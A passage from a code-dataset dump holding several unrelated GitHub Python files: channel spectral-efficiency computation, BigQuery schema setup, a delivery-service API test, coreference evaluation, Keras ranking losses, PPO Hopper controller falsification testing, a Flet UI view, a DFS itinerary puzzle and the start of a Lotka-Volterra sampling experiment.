None:\n return self.calc_spectral_eff(sched_decision, step_number)\n else:\n spectral_efficiencies = [\n np.ones((self.max_number_ues, self.num_available_rbs[i]))\n for i in np.arange(self.max_number_basestations)\n ]\n return np.array(spectral_efficiencies)\n\n def calc_spectral_eff(\n self, sched_decision: np.ndarray, step_number: int\n ) -> np.ndarray:\n # Sum transmitter and receiver antennas, and changing dimensions to\n # B x U x R to match sched_decision dimensions. After multiplying\n # with sched_decision, we obtain the channels only in the allocated RB\n allocated_rbs_channels = (\n np.expand_dims(\n np.sum(\n np.sum(self.episode_channels[:, :, :, :, step_number], 0),\n 0,\n ),\n 0,\n )\n * sched_decision\n )\n\n allocated_rbs_rsrp = np.power(np.abs(allocated_rbs_channels), 2)\n spectral_efficiencies = np.log2(\n 1\n + (\n (self.transmission_power / self.num_available_rbs[0])\n * allocated_rbs_rsrp\n / self.thermal_noise_power\n )\n )\n return spectral_efficiencies\n\n def read_mat_files(self, episode: int) -> np.ndarray:\n channels = sio.loadmat(f\"channels/quadriga_channels/sim_{episode}.mat\")\n\n return channels[\"H\"]\n","repo_name":"lasseufpa/rrs_industrial_scenario","sub_path":"channels/quadriga.py","file_name":"quadriga.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20707484488","text":"from google.cloud import bigquery\n\ndef bq_create_sensorlog(dataset_id, tablename):\n bigquery_client = bigquery.Client()\n dataset_ref = bigquery_client.dataset(dataset_id)\n\n # Prepares a reference to the table\n table_ref = dataset_ref.table(tablename)\n\n try:\n bigquery_client.get_table(table_ref)\n except:\n schema = [\n bigquery.SchemaField('log_id', 'STRING', mode='REQUIRED', description='UUID'),\n bigquery.SchemaField('loggingTime', 'TIMESTAMP', mode='NULLABLE', description='loggingTime(JST)'),\n bigquery.SchemaField('device_id', 'STRING', mode='NULLABLE', description='device_id'),\n bigquery.SchemaField('locationLatitude', 'FLOAT64', mode='NULLABLE', description='locationLatitude(WGS84)'),\n bigquery.SchemaField('locationLongitude', 'FLOAT64', mode='NULLABLE', description='locationLongitude(WGS84)'),\n bigquery.SchemaField('locationTrueHeading', 'FLOAT64', mode='NULLABLE', description='motionPitch(°)'),\n bigquery.SchemaField('motionPitch', 'FLOAT64', mode='NULLABLE', description='motionPitch(rad)'),\n bigquery.SchemaField('motionRoll', 'FLOAT64', mode='NULLABLE', description='motionRoll(rad)'),\n bigquery.SchemaField('motionYaw', 'FLOAT64', mode='NULLABLE', description='motionYaw(rad)'),\n bigquery.SchemaField('speed', 'FLOAT64', mode='NULLABLE', description='speed(m/s)'),\n bigquery.SchemaField('distance', 'FLOAT64', mode='NULLABLE', description='distanse(m)'),\n ]\n table = bigquery.Table(table_ref, schema=schema)\n table = bigquery_client.create_table(table)\n print('table {} created.'.format(table.table_id))\n\n\ndef bq_create_logmap(dataset_id, tablename):\n bigquery_client = bigquery.Client()\n dataset_ref = bigquery_client.dataset(dataset_id)\n\n # Prepares a reference to the table\n table_ref = dataset_ref.table(tablename)\n\n try:\n bigquery_client.get_table(table_ref)\n except:\n schema = [\n bigquery.SchemaField('outline_id', 'STRING', mode='REQUIRED', description='outline_id'),\n bigquery.SchemaField('html_name', 'STRING', mode='REQUIRED', description='foliumで可視化したhtmlファイル名'),\n ]\n table = bigquery.Table(table_ref, schema=schema)\n table = bigquery_client.create_table(table)\n print('table {} created.'.format(table.table_id))\n\nif __name__ == '__main__':\n dataset_id = \"smartphone_log\"\n tablename = \"sensorlog\"\n bq_create_sensorlog(dataset_id, tablename)\n\n dataset_id = \"smartphone_log\"\n tablename = \"log_map\"\n bq_create_logmap(dataset_id, tablename)\n","repo_name":"KeioSailingDev/web_yacht_note","sub_path":"log_insert/bigquery_create.py","file_name":"bigquery_create.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33621964672","text":"import pytest\n\nfrom tests_eats_products import experiments\nfrom tests_eats_products import utils\n\n\nPRODUCTS_BASE_REQUEST = {\n 'shippingType': 'pickup',\n 'slug': 'slug',\n 'category': 1,\n}\n\nPUBLIC_IDS = [\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b001',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b002',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b003',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b004',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b005',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b006',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b007',\n]\n\nSKU_IDS = ['1', '2', '3', '4', '5']\n\nTHIS_PLACE_ID = str(utils.PLACE_ID)\nOTHER_PLACE_ID = '2'\n\nEATER_ID = '123'\nHEADERS = {'X-Eats-User': f'user_id={EATER_ID}'}\n\nHAS_HISTORY_BRANDS = ['set', f'has_history:{EATER_ID}:brands', '1']\nHAS_CROSS_BRANDS_HISTORY = ['set', f'has_history:{EATER_ID}:cross_brands', '1']\n\n\n@experiments.cross_brand_history()\n@pytest.mark.config(\n EATS_PRODUCTS_SETTINGS={'discount_promo': {'enabled': True}},\n EATS_PRODUCTS_BADGES=utils.EATS_PRODUCTS_BADGES,\n)\nasync def test_cross_brand_badges_discount(\n taxi_eats_products,\n sql_add_brand,\n sql_add_place,\n mock_nomenclature_static_info_context,\n mock_nomenclature_dynamic_info_context,\n add_default_product_mapping,\n make_public_by_sku_id_response,\n mockserver,\n mock_retail_categories_cross_brand_orders,\n mock_retail_categories_brand_orders_history,\n):\n \"\"\"\n Тест проверяет выставление цветов для бейджа со скидкой (cross_brand)\n \"\"\"\n sql_add_brand(2, 'brand2')\n sql_add_place(2, 'slug2', 2)\n\n public_ids = PUBLIC_IDS[:2]\n add_default_product_mapping()\n for public_id in public_ids:\n mock_nomenclature_static_info_context.add_product(public_id)\n mock_nomenclature_dynamic_info_context.add_product(\n public_id, old_price=1000,\n )\n\n place_sku_to_public_ids = {\n THIS_PLACE_ID: {\n SKU_IDS[0]: [public_ids[0]],\n SKU_IDS[1]: [public_ids[1]],\n },\n OTHER_PLACE_ID: {SKU_IDS[1]: [public_ids[1]]},\n }\n\n mock_retail_categories_cross_brand_orders.add_product(\n int(THIS_PLACE_ID), PUBLIC_IDS[0], 2, SKU_IDS[0],\n )\n mock_retail_categories_cross_brand_orders.add_product(\n int(THIS_PLACE_ID), PUBLIC_IDS[1], 5, SKU_IDS[1],\n )\n mock_retail_categories_cross_brand_orders.add_product(\n int(OTHER_PLACE_ID), PUBLIC_IDS[1], 5, SKU_IDS[1],\n )\n\n @mockserver.json_handler(utils.Handlers.NOMENCLATURE_PUBLIC_ID_BY_SKU_ID)\n def _mock_public_id_by_sku_id(request):\n return make_public_by_sku_id_response(request, place_sku_to_public_ids)\n\n response = await taxi_eats_products.post(\n utils.Handlers.CROSS_BRAND_HISTORY_PRODUCTS,\n json={\n 'available_places_slugs': ['slug', 'slug2'],\n 'selected_place': {'place_slug': 'slug', 'brand_name': 'Ашан'},\n },\n headers=HEADERS,\n )\n assert response.status_code == 200\n resp_item_0 = response.json()['categories'][0]['products'][0]\n expected = utils.create_expected_badges(\n utils.EATS_PRODUCTS_BADGES['discount_badges'],\n )\n\n utils.compare_badges(resp_item_0, expected)\n\n assert mock_retail_categories_cross_brand_orders.handler.times_called == 1\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_products/test_cross_brand_badges.py","file_name":"test_cross_brand_badges.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8312279295","text":"\"\"\"Script that runs and evaluates neural coref coreference resolution library on bionlp dataset\"\"\"\nimport glob\nimport logging\nimport os\nimport spacy\nimport neuralcoref\nfrom bionlp_eval import (coref_clusters_to_spans, get_a2_file, get_coref_spans, cluster_comparison, f1_, precision, recall)\n\n# modify model and codes used here\nMODEL = 'ner_models/jnlpba_ner'\nNER_MOD_TO_COMBINE = 'en_ner_craft_md'\nCODES = 'alg_plfp_glfpma_pco_pner' # seperated by '_' -- see results/res_codes.txt\nprune_by_ner = {'DNA', 'RNA', 'PROTEIN', 'CELL_TYPE'}\n####\n\n####\n# change model as needed\nnlp = spacy.load(MODEL)\n# nlp.add_pipe(nlp.create_pipe('sentencizer'))\n####\n# neuralcoref.add_to_pipe(nlp)\n\n\ndef get_txt_files(path_to_files):\n \"\"\"returns iterator which yeilds txt files in given dir\"\"\"\n return glob.iglob(os.path.join(path_to_files, '*.txt'))\n\n\ndef calculate_metrics(pos_neg_dict, pred_gold_totals, greedyness=0.5, write_res=False):\n \"\"\"calculates metrics and writes to txt file\"\"\"\n tp = pos_neg_dict['true_pos']\n fp = pos_neg_dict['false_pos']\n fn = pos_neg_dict['false_neg']\n\n prec = precision(tp, fp)\n rec = recall(tp, fn)\n\n f1 = f1_(prec, rec)\n\n if write_res:\n write_results(f1, prec, rec, pred_gold_totals, pos_neg_dict, greedyness=greedyness)\n\n\ndef write_results(f1, precision, recall, pred_gold_totals, pos_neg_dict, greedyness=0.5):\n with open(f'{MODEL}_{CODES}_g={str(greedyness)}.txt', 'w') as out:\n out.write('[ACCURACY METRICS]')\n out.write(f'\\n[F1] {f1*100}%')\n out.write(f'\\n[PRECISION] {precision*100}%')\n out.write(f'\\n[RECALL] {recall*100}%')\n # total clusters generated\n out.write(f'\\n[TOTAL PREDICTED CLUSTERS] {pred_gold_totals[0]}')\n out.write(f'\\n[TOTAL GOLD CLUSTERS] {pred_gold_totals[1]}')\n out.write(f'\\n[TRUE POSITIVES] {pos_neg_dict[\"true_pos\"]}') \n out.write(f'\\n[FALSE POSITIVES] {pos_neg_dict[\"false_pos\"]}') \n out.write(f'\\n[FALSE NEGATIVES] {pos_neg_dict[\"false_neg\"]}')\n\n# 'DNA', 'CELL_TYPE', 'CELL_LINE', 'RNA', 'PROTEIN'\ndef process_txt_files(txt_files, greedyness=0.5, prune_by_ner=None):\n \"\"\"takes an iterable containing paths txt files\"\"\"\n total_pred = 0\n total_gold = 0\n for f in txt_files:\n logging.info(f'[PROCESSING FILE] {f}')\n f_op = open(f, 'r', encoding='utf-8')\n f_str = f_op.read()\n f_op.close()\n doc = nlp(f_str)\n # funky bug where files with 1 line throw a TypeError\n try:\n nc_clusts = coref_clusters_to_spans(doc._.coref_clusters, doc.text,\n prune_by_ner=prune_by_ner) # neural coref pred clusts\n a2_f = get_a2_file(f) # get corresponding annotated file \n gold_clusts, min_spans = get_coref_spans(a2_f) # bionlp\n except TypeError as te:\n logging.warn(te)\n logging.warn(f'[FILE SKIPPED] {f}')\n print(f'[FILE SKIPPED] {f}')\n continue # muddle about - dont process anyting else in this loop\n # comparison\n pos_neg_dict = cluster_comparison(nc_clusts, gold_clusts, min_spans) # get positive negatives\n # keep track of total\n total_pred += len(nc_clusts)\n total_gold += len(gold_clusts)\n ####\n logging.info(f'[FINISHED PROCESSING FILE] {f}')\n pred_gold_totals = (total_pred, total_gold)\n calculate_metrics(pos_neg_dict, pred_gold_totals, greedyness=greedyness, write_res=True)\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n filename=f'log/bionlp_eval.log',\n level=logging.INFO,\n format= '[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s',\n datefmt='%H:%M:%S'\n )\n logger = logging.getLogger('bionlp_eval')\n logger.setLevel(logging.DEBUG)\n\n greedyness = .5\n txt_it = get_txt_files('eval_data/train') # iterator over all txt files in dir\n neuralcoref.add_to_pipe(nlp, greedyness=greedyness)\n process_txt_files(txt_it, greedyness=greedyness, prune_by_ner=prune_by_ner)\n","repo_name":"masonedmison/coref","sub_path":"nueral_bionlp.py","file_name":"nueral_bionlp.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2749162850","text":"from __future__ import absolute_import\n\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\n\ndef getClassWeights(Y, mu=0.5):\n return np.array([w for w in np.log(mu*Y.shape[0]/Y.sum(axis=0))])\n\ndef focal_loss(y_true, y_pred, alpha, gamma=0.5):\n alpha = K.variable(alpha)\n pt = K.abs(1. - y_true - y_pred)\n pt = K.clip(pt, K.epsilon(), 1. - K.epsilon())\n return K.mean(-alpha * K.pow(1. - pt, gamma) * K.log(pt), axis=-1)\n\ndef u_statistic_loss(y_true, y_pred, gamma=0.2, p=3.0):\n \"\"\" U statistic loss\n Approximates the Area Under Curve score, using approximation based on\n the Wilcoxon-Mann-Whitney U statistic.\n Yan, L., Dodier, R., Mozer, M. C., & Wolniewicz, R. (2003).\n Optimizing Classifier Performance via an Approximation to the Wilcoxon-Mann-Whitney Statistic.\n Measures overall performance for a full range of threshold levels.\n Arguments:\n y_pred: `Tensor`. Predicted values.\n y_true: `Tensor` . Targets (labels), a probability distribution.\n \"\"\"\n with tf.name_scope(\"u_statistic_loss\"):\n \n pos = tf.boolean_mask(y_pred, tf.cast(y_true, tf.bool))\n neg = tf.boolean_mask(y_pred, ~tf.cast(y_true, tf.bool))\n \n pos = tf.expand_dims(pos, 0)\n neg = tf.expand_dims(neg, 1)\n \n difference = tf.zeros_like(pos * neg) + pos - neg - gamma\n masked = tf.boolean_mask(difference, difference < 0.0)\n return tf.reduce_sum(tf.pow(-masked, p))\n\ndef SoftAUC_loss(y_true, y_pred):\n y_true = tf.cast(y_true, tf.int32)\n parts = tf.dynamic_partition(y_pred, y_true, 2)\n y_pos = parts[1]\n y_neg = parts[0]\n y_pos = tf.expand_dims(y_pos, 0)\n y_neg = tf.expand_dims(y_neg, -1)\n return K.mean(K.sigmoid(y_neg - y_pos))\n\ndef SVMrank_loss(y_true, y_pred):\n margin = 1.0\n y_true = tf.cast(y_true, tf.int32)\n parts = tf.dynamic_partition(y_pred, y_true, 2)\n y_pos = parts[1]\n y_neg = parts[0]\n y_pos = tf.expand_dims(y_pos, 0)\n y_neg = tf.expand_dims(y_neg, -1)\n return K.mean(K.relu(margin - y_neg - y_pos))\n\n\n###########experimental losses##############\n\ndef exp_loss(y_true, y_pred):\n loss = u_statistic_loss(y_true,y_pred) + SoftAUC_loss(y_true, y_pred)\n return loss\n\ndef art_loss(y_true, y_pred):\n loss = u_statistic_loss(y_true,y_pred) + SVMrank_loss(y_true, y_pred)\n return loss","repo_name":"thinline72/toxic","sub_path":"skolbachev/toxic/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"66"} +{"seq_id":"71003338452","text":"'''\nHere we consider a controller trained on PPO for the hopper\nenvironment in OpenAI Gym. The controller was taken from baselines/ppo\n'''\n\n\nfrom baselines.common import set_global_seeds, tf_util as U\nimport gym, logging\nfrom baselines import logger\nimport numpy as np\nimport tensorflow as tf\nfrom baselines.pposgd import mlp_policy, pposgd_simple\nfrom baselines.pposgd.pposgd_simple import *\n\ndef learn_return(env, policy_func, *,\n timesteps_per_batch, # timesteps per actor per update\n clip_param, entcoeff, # clipping parameter epsilon, entropy coeff\n optim_epochs, optim_stepsize, optim_batchsize,# optimization hypers\n gamma, lam, # advantage estimation\n max_timesteps=0, max_episodes=0, max_iters=0, max_seconds=0, # time constraint\n callback=None, # you can do anything in the callback, since it takes locals(), globals()\n schedule='constant' # annealing for stepsize parameters (epsilon and adam)\n ):\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space) # Construct network for new policy\n oldpi = policy_func(\"oldpi\", ob_space, ac_space) # Network for old policy\n atarg = tf.placeholder(dtype=tf.float32, shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule\n clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n pol_entpen = (-entcoeff) * meanent\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold\n surr1 = ratio * atarg # surrogate from conservative policy iteration\n surr2 = U.clip(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg #\n pol_surr = - U.mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP)\n vfloss1 = tf.square(pi.vpred - ret)\n vpredclipped = oldpi.vpred + tf.clip_by_value(pi.vpred - oldpi.vpred, -clip_param, clip_param)\n vfloss2 = tf.square(vpredclipped - ret)\n vf_loss = .5 * U.mean(tf.maximum(vfloss1, vfloss2)) # we do the same clipping-based trust region for the value function\n total_loss = pol_surr + pol_entpen + vf_loss\n losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n\n var_list = pi.get_trainable_variables()\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult], losses + [U.flatgrad(total_loss, var_list)])\n adam = MpiAdam(var_list)\n\n assign_old_eq_new = U.function([],[], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses)\n\n U.initialize()\n adam.sync()\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards\n\n assert sum([max_iters>0, max_timesteps>0, max_episodes>0, max_seconds>0])==1, \"Only one time constraint permitted\"\n\n while True:\n if callback: callback(locals(), globals())\n if max_timesteps and timesteps_so_far >= max_timesteps:\n break\n elif max_episodes and episodes_so_far >= max_episodes:\n break\n elif max_iters and iters_so_far >= max_iters:\n break\n elif max_seconds and time.time() - tstart >= max_seconds:\n break\n\n if schedule == 'constant':\n cur_lrmult = 1.0\n elif schedule == 'linear':\n cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n else:\n raise NotImplementedError\n\n logger.log(\"********** Iteration %i ************\"%iters_so_far)\n\n seg = seg_gen.__next__()\n print(sum(seg['rew']),seg['rew'], len(seg['rew']))\n add_vtarg_and_adv(seg, gamma, lam)\n\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=not pi.recurrent)\n optim_batchsize = optim_batchsize or ob.shape[0]\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n assign_old_eq_new() # set old parameter values to new parameter values\n logger.log(\"Optimizing...\")\n logger.log(fmt_row(13, loss_names))\n # Here we do a bunch of optimization epochs over the data\n for _ in range(optim_epochs):\n losses = [] # list of tuples, each of which gives the loss for a minibatch\n for batch in d.iterate_once(optim_batchsize):\n *newlosses, g = lossandgrad(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult)\n adam.update(g, optim_stepsize * cur_lrmult)\n losses.append(newlosses)\n logger.log(fmt_row(13, np.mean(losses, axis=0)))\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far+=1\n\n return pi\n\nU.make_session(num_cpu=1).__enter__()\nseed = np.random.randint(2**32-1)\nset_global_seeds(seed)\nenv_id = 'Hopper-v1'\nenv = gym.make(env_id)\nnum_timesteps=5e6\n\ndef policy_fn(name, ob_space, ac_space):\n return mlp_policy.MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,\n hid_size=64, num_hid_layers=2)\n\nenv.seed(seed)\ngym.logger.setLevel(logging.WARN)\npi = learn_return(env, policy_fn,\n max_timesteps=num_timesteps,\n timesteps_per_batch=2048,\n clip_param=0.2, entcoeff=0.0,\n optim_epochs=10, optim_stepsize=3e-4, optim_batchsize=64,\n gamma=0.99, lam=0.95,\n )\n\ndef compute_traj(**kwargs):\n env.reset()\n # This sets the init_qpos\n if 'init_state' in kwargs:\n env.env.init_qpos = kwargs['init_state']\n # State perturbation\n if 'state_per' in kwargs:\n state_per = kwargs['state_per']\n # Velocity perturbation\n if 'vel_per' in kwargs:\n vel_per = kwargs['vel_per']\n\n qpos = state_per+env.env.init_qpos\n qvel = vel_per+env.env.init_qvel\n env.env.set_state(qpos,qvel)\n ob = env.env._get_obs()\n traj = [ob]\n reward = 0\n done=False\n iters = 0\n while not done:\n action, vpred = pi.act(False,ob)\n ob, r, done, additional_data = env.step(action)\n reward += r\n traj.append(ob)\n iters+=1\n additional_data['reward']=reward\n additional_data['iters'] = iters\n return traj, additional_data\n\n# ------------------------------------------------------------------------------\nfrom active_testing import pred_node, max_node, min_node, test_module\nfrom active_testing.utils import sample_from\nrand_nums=[1230597240,\n 366379077,\n 1450717077,\n 4233612701,\n 315635237,\n 717888137,\n 4012326164,\n 3986671499,\n 1738011324,\n 719534766]\n\nbounds = [(-0.005, 0.005)]*7\nbounds[0] = (1.23, 1.27) # Bounds on the init_state and velocity perturbation\n\ndef sut(x0):\n init_state = x0[0]\n init_qpos = np.zeros(6)\n init_qpos[1] = init_state\n state_per = np.zeros(6)\n vel_per = x0[1:7]\n return compute_traj(init_state=init_qpos, state_per=state_per,\n vel_per=vel_per)\n\n\n# Requirement 1: Find the initial state and velocity that minimizes the reward\n# We need only one node for the reward. The reward is a smooth function\n# given that the closed loop system is deterministic\n\nsmooth_details_r1 = []\nrandom_details_r1 = []\n\n\n# This set assumes random sampling and checking\nfor r in rand_nums:\n np.random.seed(r)\n node0 = pred_node(f=lambda traj: traj[1]['reward'])\n TM = test_module(bounds=bounds, sut=lambda x0: sut(x0),\n f_tree = node0, with_random = True, init_sample = 70,\n optimize_restarts=5, exp_weight=10)\n TM.initialize()\n TM.run_BO(180)\n smooth_details_r1.append([np.sum(TM.f_acqu.GP.Y < -3.75),\n TM.smooth_min_x,TM.smooth_min_val])\n random_details_r1.append([np.sum(np.array(TM.random_Y) < -3.75),\n TM.rand_min_x, TM.rand_min_val])\n print(r, smooth_details_r1[-1], random_details_r1[-1])\n\n# Requirement 2: Find the initial state, goal state that minimizes the amount\n# of time the robot is able to stay upright\n# We need only one node for the time. The time taken is a smooth function\n# given that the closed loop system is deterministic.\n\nsmooth_details_r2 = []\nrandom_details_r2 = []\n\n\n# This set assumes random sampling and checking\nfor r in rand_nums[0:2]:\n np.random.seed(r)\n node0 = pred_node(f=lambda traj: traj[1]['iters'])\n TM = test_module(bounds=bounds, sut=lambda x0: sut(x0),\n f_tree = node0, with_random = True, init_sample = 70,\n optimize_restarts=5, exp_weight=10)\n TM.initialize()\n TM.run_BO(180)\n smooth_details_r2.append([np.sum(TM.f_acqu.GP.Y < 50),\n TM.smooth_min_x,TM.smooth_min_val])\n random_details_r2.append([np.sum(np.array(TM.random_Y) < 50),\n TM.rand_min_x, TM.rand_min_val])\n print(r, smooth_details_r2[-1], random_details_r2[-1])","repo_name":"shromonag/adversarial_testing","sub_path":"tests/test_hopper.py","file_name":"test_hopper.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"38573861856","text":"from flet import *\nfrom data import *\n\nclass SignUpSuccess(UserControl):\n def __init__(self, page: Page):\n self.page = page\n super().__init__()\n\n def login(self, event):\n self.page.go(\"/login\")\n\n def home(self, event):\n self.page.go(\"/\")\n \n def build(self):\n self.close_btn = Container(\n alignment= alignment.top_left,\n content = IconButton(\n icon = icons.CLOSE_SHARP,\n icon_color= colors.WHITE,\n on_click= self.home,\n )\n )\n self.check_mark = Container(\n padding= 5,\n bgcolor= GREEN_COLOR,\n border_radius= 35,\n height= 70,\n width = 70,\n margin= 70,\n content = Icon(\n icons.CHECK_SHARP,\n color = colors.WHITE,\n size= 30\n )\n )\n\n self.success = Container(\n margin= 10,\n content= Text(\n \"Success!\",\n color = colors.WHITE,\n size = 30,\n weight = FontWeight.BOLD,\n text_align= TextAlign.CENTER\n )\n )\n self.hint = Container(\n margin = margin.only(bottom=150),\n content= Text(\n value=\"You have successfully signup proceed to \",\n size= 14,\n weight= FontWeight.W_400,\n color = colors.WHITE,\n text_align = TextAlign.CENTER,\n spans=[\n TextSpan(\n text=\"Login Page\",\n style= TextStyle(\n color= GREEN_COLOR\n ),\n on_click = self.login\n )\n ]\n )\n )\n \n self.chat = Container(\n margin= 10,\n content= Text(\n \"Chat with us\",\n color = GREEN_COLOR,\n size = 14,\n weight = FontWeight.W_500,\n text_align= TextAlign.CENTER\n )\n )\n self.page_controls = Column(\n alignment = MainAxisAlignment.CENTER,\n horizontal_alignment= CrossAxisAlignment.CENTER,\n controls= [\n self.close_btn,\n self.check_mark,\n self.success,\n self.hint,\n self.chat\n ]\n )\n\n return self.page_controls","repo_name":"philippython/Python-Programming-Mastery","sub_path":"Section 22 Building a Fintech App with flet/final code/leon/views/signup_success.py","file_name":"signup_success.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"73422122449","text":"'''\ndfs+백트레킹\n'''\ndef dfs(graph,tLen,result,now):\n result.append(now)\n if len(result)==tLen+1: return True\n if now not in graph:\n result.pop()\n return False\n #now와 연결된 value들 조사\n for _ in range(len(graph[now])):\n next=graph[now][-1]\n #now의 맨 뒤의 요소 삭제\n graph[now].pop()\n if dfs(graph,tLen,result,next):\n return True\n graph[now].insert(0,next)\n result.pop()\n return False\n\ndef solution(tickets):\n graph={}\n for start,end in tickets:\n # get(찾을 값, 찾는 값 없으면 default값)\n graph[start]=graph.get(start,[])+[end]\n #value 역순으로 정렬 (맨 뒤부터 pop하기 위해서)\n for key in graph.keys():\n graph[key].sort(reverse=True)\n path=[]\n if dfs(graph,len(tickets),path,'ICN'):\n result=path\n return result\n\n#print(solution([[\"ICN\", \"JFK\"], [\"HND\", \"IAD\"], [\"JFK\", \"HND\"]]))\n#print(solution([[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], [\"ATL\",\"SFO\"]]))\nprint(solution([['ICN', 'A'], ['ICN', 'B'], ['B', 'ICN']]))\n#print(solution([['ICN', 'A'], ['ICN', 'A'], ['A', 'ICN'],['A','C']]))\n#print(solution([[\"ICN\", \"A\"], [\"ICN\", \"A\"], [\"A\", \"ICN\"]] ))\n#print(solution([[\"ICN\",\"BOO\"], [\"ICN\", \"COO\"], [ \"COO\", \"DOO\" ], [\"DOO\", \"COO\"], [ \"BOO\", \"DOO\"] ,[\"DOO\", \"BOO\"], [\"BOO\", \"ICN\" ], [\"COO\", \"BOO\"]] ))","repo_name":"dbswl4951/programmers","sub_path":"programmers_level3/여행경로.py","file_name":"여행경로.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14803356824","text":"\"\"\"\nReproduces the Lotka-Volterra experiment.\n\"\"\"\nimport time \nfrom numpy import zeros, nan, repeat, save, unique\nfrom copy import deepcopy\nfrom ConstrainedRWM import CRWM\nfrom HelperFunctions import compute_arviz_miness_runtime, generate_powers_of_ten\nfrom TangentialHug import THUG\nfrom Manifolds import LVManifold\nimport os\n\n\ndef generate_settings(N, δ, Ns, Bs, ϵs, seeds, n_chains=4, u1_true=True, tol=1e-15, maxiter=5000):\n \"\"\"Generates variables for the experiment.\"\"\"\n manifold = LVManifold(Ns=Ns, n_chains=n_chains, seeds=seeds)\n u0s = manifold.find_init_points_for_each_chain(u1_true=u1_true, tol=tol, maxiter=maxiter)\n print(\"Settings Ns = \", Ns, \". All rows equal? \", (u0s == u0s[0]).all())\n return {\n 'N': N,\n 'δ': δ,\n 'Ns': Ns,\n 'Bs': Bs,\n 'ϵs': ϵs,\n 'u0s': u0s,\n 'manifold': manifold,\n 'n_chains': n_chains,\n 'seeds': seeds,\n 'rngs': manifold.rngs\n }\n\n\ndef cc_experiment_thug(settings, α=0.0, verbose=False, safe=False):\n \"\"\"Computational Cost of THUG and C-RWM.\"\"\"\n verboseprint = print if verbose else lambda *a, **k: None\n ϵs, Bs = settings['ϵs'], settings['Bs']\n rngs = settings['rngs']\n u0s = settings['u0s']\n δ = settings['δ']\n N = settings['N']\n J = settings['manifold'].J\n n_chains = settings['n_chains']\n ESS_TABLE = zeros((len(ϵs), len(Bs)))\n AP_TABLE = zeros((len(ϵs), len(Bs)))\n for ϵ_ix, ϵ in enumerate(ϵs):\n logηϵ = settings['manifold'].generate_logpi(ϵ)\n for B_ix, B in enumerate(Bs):\n chains = []\n times = []\n avg_ap = 